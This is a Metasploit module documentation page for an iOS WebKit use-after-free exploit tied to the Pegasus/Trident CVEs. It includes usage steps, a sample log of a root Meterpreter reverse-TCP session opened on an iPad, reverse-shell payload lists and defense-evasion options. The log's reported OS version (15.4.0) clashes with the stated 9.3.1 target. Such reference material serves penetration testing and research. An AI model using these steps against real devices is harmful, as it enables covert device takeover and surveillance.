WebKit not_number defineProperties UAF - Metasploit


This page contains detailed information about how to use the exploit/apple_ios/browser/webkit_trident metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: WebKit not_number defineProperties UAF
Module: exploit/apple_ios/browser/webkit_trident
Source code: modules/exploits/apple_ios/browser/webkit_trident.rb
Disclosure date: 2016-08-25
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): aarch64
Supported platform(s): Apple_iOS
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-4655, CVE-2016-4656, CVE-2016-4657

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.

Module Ranking and Traits

Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage

msf > use exploit/apple_ios/browser/webkit_trident
msf exploit(webkit_trident) > exploit

Knowledge Base

Description

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library, CVE-2016-4657.

Vulnerable Application

The exploit should work on 32-bit or 64-bit devices running iOS 9.3.4 or earlier, though it has been tested so far on 64-bit devices running 9.3.1.

Verification Steps

  • Start msfconsole
  • use exploit/apple_ios/browser/webkit_trident
  • set LHOST and SRVHOST as appropriate
  • exploit
  • Browse to the given URL with a vulnerable device from Safari
  • Note that the payload is specially created for this exploit, due to sandbox limitations that prevent spawning new processes.

Scenarios

64bit (ME279NF/A) running iOS 9.3.1:

msf exploit(apple_ios/browser/webkit_trident) >
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[*] 192.168.0.101    webkit_trident - Sent exploit (770048 bytes)
[*] 192.168.0.101    webkit_trident - Request from Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1
[+] 192.168.0.101    webkit_trident - Target is vulnerable.
[*] Meterpreter session 1 opened (192.168.0.110:4444 -> 192.168.0.101:52467) at 2018-05-30 14:49:59 +0200

msf exploit(apple_ios/browser/webkit_trident) > sessions -l

Active sessions
===============

  Id  Name  Type                           Information                                   Connection
  --  ----  ----                           -----------                                   ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.0.101  192.168.0.110:4444 -> 192.168.0.101:52467 (192.168.0.101)

msf exploit(apple_ios/browser/webkit_trident) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.101
OS           : iPad4,4 (iOS 15.4.0)
Architecture : arm64
BuildTuple   : aarch64-iphone-darwin
Meterpreter  : aarch64/apple_ios

Go back to menu.

Msfconsole Usage

Here is how the apple_ios/browser/webkit_trident exploit module looks in the msfconsole:

msf6 > use exploit/apple_ios/browser/webkit_trident

[*] Using configured payload apple_ios/aarch64/meterpreter_reverse_tcp
msf6 exploit(apple_ios/browser/webkit_trident) > show info

       Name: WebKit not_number defineProperties UAF
     Module: exploit/apple_ios/browser/webkit_trident
   Platform: Apple_iOS
       Arch: aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2016-08-25

Provided by:
  qwertyoruiop
  siguza
  tihmstar
  benjamin-42
  timwr

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH  /                yes       The URI to use for this exploit.

Payload information:

Description:
  This module exploits a UAF vulnerability in WebKit's JavaScriptCore 
  library.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-4655
  https://nvd.nist.gov/vuln/detail/CVE-2016-4656
  https://nvd.nist.gov/vuln/detail/CVE-2016-4657
  http://www.securityfocus.com/bid/92651
  http://www.securityfocus.com/bid/92652
  http://www.securityfocus.com/bid/92653
  https://blog.lookout.com/trident-pegasus
  https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
  https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf
  https://github.com/Siguza/PhoenixNonce
  https://jndok.github.io/2016/10/04/pegasus-writeup/
  https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html
  https://github.com/benjamin-42/Trident
  http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html

Module Options

This is a complete list of options available in the apple_ios/browser/webkit_trident exploit:

msf6 exploit(apple_ios/browser/webkit_trident) > show options

Module options (exploit/apple_ios/browser/webkit_trident):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                yes       The URI to use for this exploit.

Payload options (apple_ios/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options

Here is a complete list of advanced options supported by the apple_ios/browser/webkit_trident exploit:

msf6 exploit(apple_ios/browser/webkit_trident) > show advanced

Module advanced options (exploit/apple_ios/browser/webkit_trident):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (apple_ios/aarch64/meterpreter_reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the apple_ios/browser/webkit_trident module can exploit:

msf6 exploit(apple_ios/browser/webkit_trident) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the apple_ios/browser/webkit_trident exploit:

msf6 exploit(apple_ios/browser/webkit_trident) > show payloads

Compatible Payloads
===================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  payload/apple_ios/aarch64/meterpreter_reverse_http                    normal  No     Apple_iOS Meterpreter, Reverse HTTP Inline
   1  payload/apple_ios/aarch64/meterpreter_reverse_https                   normal  No     Apple_iOS Meterpreter, Reverse HTTPS Inline
   2  payload/apple_ios/aarch64/meterpreter_reverse_tcp                     normal  No     Apple_iOS Meterpreter, Reverse TCP Inline
   3  payload/apple_ios/aarch64/shell_reverse_tcp                           normal  No     Apple iOS aarch64 Command Shell, Reverse TCP Inline
   4  payload/generic/custom                                                normal  No     Custom Payload
   5  payload/generic/shell_bind_tcp                                        normal  No     Generic Command Shell, Bind TCP Inline
   6  payload/generic/shell_reverse_tcp                                     normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options

Here is the full list of possible evasion options supported by the apple_ios/browser/webkit_trident exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(apple_ios/browser/webkit_trident) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • qwertyoruiop
  • siguza
  • tihmstar
  • benjamin-42
  • timwr

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.